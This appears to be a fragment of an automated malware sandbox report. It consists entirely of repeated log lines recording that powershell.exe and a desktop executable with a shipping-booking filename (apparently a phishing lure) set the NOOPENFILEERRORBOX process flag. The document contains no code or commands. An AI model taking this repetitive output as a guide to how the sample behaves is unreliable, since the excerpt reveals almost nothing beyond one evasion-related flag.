Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
